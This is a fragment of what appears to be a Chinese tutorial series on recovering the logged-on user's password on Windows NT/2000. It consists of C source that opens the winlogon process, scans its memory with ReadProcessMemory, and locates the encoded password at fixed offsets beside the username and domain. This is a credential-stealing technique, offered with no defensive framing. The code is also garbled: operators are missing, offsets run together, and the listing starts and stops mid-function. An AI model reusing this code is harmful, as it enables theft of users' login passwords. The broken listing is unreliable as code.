获取WinNT/Win2k当前用户名和密码(5)
{}
// Format("您的登陆时间为: %d/%d/%d %d:%d:%d\n",
// ARRAYOFCONST((stSystemTime.wMonth, stSystemTime.wDay,
// stSystemTime.wYear, stSystemTime.wHour,
// stSystemTime.wMinute, stSystemTime.wSecond))));
*pdwPwdLen = (pepiEncodedPwdInfo->EncodedPassword.Length
& 0x00ff) / sizeof (wchar_t);
dwHashByte = (pepiEncodedPwdInfo->EncodedPassword.Length
& 0xff00) >> 8;
pvRealPwd = (PVOID)(*pdwWinLogonHeap (dwUserNamePos -
(DWORD)pvWinLogonMem) USER_PASSWORD_OFFSET_WINNT 0x34);
pvPwd = (PVOID)((PBYTE)(dwUserNamePos
USER_PASSWORD_OFFSET_WINNT 0x34));
bRc = TRUE;
}
}
}
HeapFree(GetProcessHeap(), 0, pvEBP);
CloseHandle(hWinLogonHandle);
return (bRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWin2K(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WIN2K 0x400
#define USER_PASSWORD_OFFSET_WIN2K 0x800
HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ, FALSE, dwWinLogonPID);
if(hWinLogonHandle == 0)
return (FALSE);
*pdwPwdLen = 0;
SYSTEM_INFO siSystemInfo;
GetSystemInfo(&siSystemInfo);
DWORD i = (DWORD)siSystemInfo.lpMinimumApplicationAddress;
DWORD dwMaxMemory = (DWORD) siSystemInfo.lpMaximumApplicationAddress;
DWORD dwIncrement = siSystemInfo.dwPageSize;
MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
while(i < dwMaxMemory)
{
if(VirtualQueryEx(hWinLogonHandle, (PVOID)i, &mbiMemoryBasicInfor,
sizeof (MEMORY_BASIC_INFORMATION)))
{
dwIncrement = mbiMemoryBasicInfor.RegionSize;
if (((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
{
PVOID pvRealStartingAddress = HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, mbiMemoryBasicInfor.RegionSize);
DWORD dwBytesCopied = 0;
if(ReadProcessMemory(hWinLogonHandle, (PVOID)i, pvRealStartingAddress,
mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
{
if((wcscmp((wchar_t *)pvRealStartingAddress, wszUserName) == 0)
&& (wcscmp((wchar_t *)((DWORD)pvRealStartingAddress
USER_DOMAIN_OFFSET_WIN2K), wszUserDomain) == 0))
{
pvRealPwd = (PVOID)(i USER_PASSWORD_OFFSET_WIN2K);
pvPwd = (PVOID)((DWORD)pvRealStartingAddress
USER_PASSWORD_OFFSET_WIN2K);
// Calculate the length of encoded unicode string.
PBYTE pbTemp = (PBYTE)pvPwd;
DWORD dwLoc = (DWORD)pbTemp;
DWORD dwLen = 0;
if((*pbTemp == 0) && (*(PBYTE)((DWORD)pbTemp 1) == 0))
{}
else
do
{
dwLen ;
dwLoc = 2;
pbTemp = (PBYTE) dwLoc;
}while(*pbTemp != 0);
*pdwPwdLen = dwLen;
CloseHandle(hWinLogonHandle);
return (TRUE);
}
}
HeapFree(GetProcessHeap(), 0, pvRealStartingAddress);
}
}
else
